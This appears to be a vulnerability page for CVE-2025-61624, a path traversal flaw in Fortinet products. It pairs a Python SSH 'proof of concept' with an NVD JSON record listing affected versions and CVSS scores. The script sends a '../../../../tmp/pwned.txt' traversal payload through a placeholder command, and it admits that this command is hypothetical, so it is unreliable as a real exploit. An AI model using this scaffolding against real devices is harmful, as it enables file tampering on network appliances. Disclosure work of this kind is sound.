CVE-2025-61624

#!/usr/bin/env python3 """ PoC for CVE-2025-61624 (Path Traversal in Fortinet Products) This script demonstrates the concept of the vulnerability. Note: Actual exploitation requires valid admin credentials and specific CLI commands. """ import paramiko def exploit(target_ip, username, password): # Establish SSH connection to the target device ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(target_ip, username=username, password=password) chan = ssh.invoke_shell() # Wait for shell to initialize import time time.sleep(1) # The specific vulnerable CLI command is abstracted here. # The vulnerability lies in the file path argument. # Payload to write a file to an arbitrary location (e.g., /tmp/pwned.txt) malicious_path = "../../../../tmp/pwned.txt" # Example command structure (hypothetical based on description) # Vulnerable command might be something like 'execute backup config' or similar payload = f'execute some_vulnerable_command save {malicious_path}\n' chan.send(payload) time.sleep(2) output = chan.recv(1024).decode() print(f"Command output: {output}") if "Success" in output or "Command executed" in output: print("[+] Exploit successful! File likely written.") else: print("[-] Exploit failed or command not vulnerable.") except Exception as e: print(f"Error: {e}") finally: ssh.close() if __name__ == "__main__": # Replace with actual target details exploit("192.168.1.1", "admin", "password")

{"cve": {"id": "CVE-2025-61624", "sourceIdentifier": "[email protected]", "published": "2026-04-14T16:16:31.300", "lastModified": "2026-05-12T13:17:23.170", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "An Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') [CWE-22] vulnerability in Fortinet FortiOS 7.6.0 through 7.6.4, FortiOS 7.4.0 through 7.4.9, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions, FortiPAM 1.7.0, FortiPAM 1.6 all versions, FortiPAM 1.5 all versions, FortiPAM 1.4 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions, FortiProxy 7.6.0 through 7.6.4, FortiProxy 7.4.0 through 7.4.11, FortiProxy 7.2 all versions, FortiProxy 7.0 all versions, FortiSwitchManager 7.2.0 through 7.2.7, FortiSwitchManager 7.0.0 through 7.0.6 may allow an authenticated attacker with admin profile and at least read-write permissions to write or delete arbitrary files via specific CLI commands."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4.0", "versionEndExcluding": "7.4.10", "matchCriteriaId": "8E0DD361-4041-480A-8B5E-1E14BBDD8133"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.5", "matchCriteriaId": "26DF2CCC-782C-4AE8-8CDE-13FFEE8676E6"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortipam:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.7.1", "matchCriteriaId": "C8E26F28-B9CA-47D5-86B0-AA98C67D9314"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.4.12", "matchCriteriaId": "92465F3D-698E-4CA6-87CB-E5A08C34067E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.5", "matchCriteriaId": "026DF873-FF5C-4629-8516-350C53CE2DEA"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiswitchmanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.7", "matchCriteriaId": "23564E7E-21B7-4936-B4F2-85CD46D64A5D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortiswitchmanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.8", "matchCriteriaId": "6EFEB80D-87BB-4AD3-AA9D-9F0C37F227D2"}]}]}], "references": [{"url": "https://fortiguard.fortinet.com/psirt/FG-IR-26-122", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://cert-portal.siemens.com/productcert/html/ssa-975644.html", "source": "0b142b55-0307-4c5a-b3c9-f314f3fb7c5e"}]}}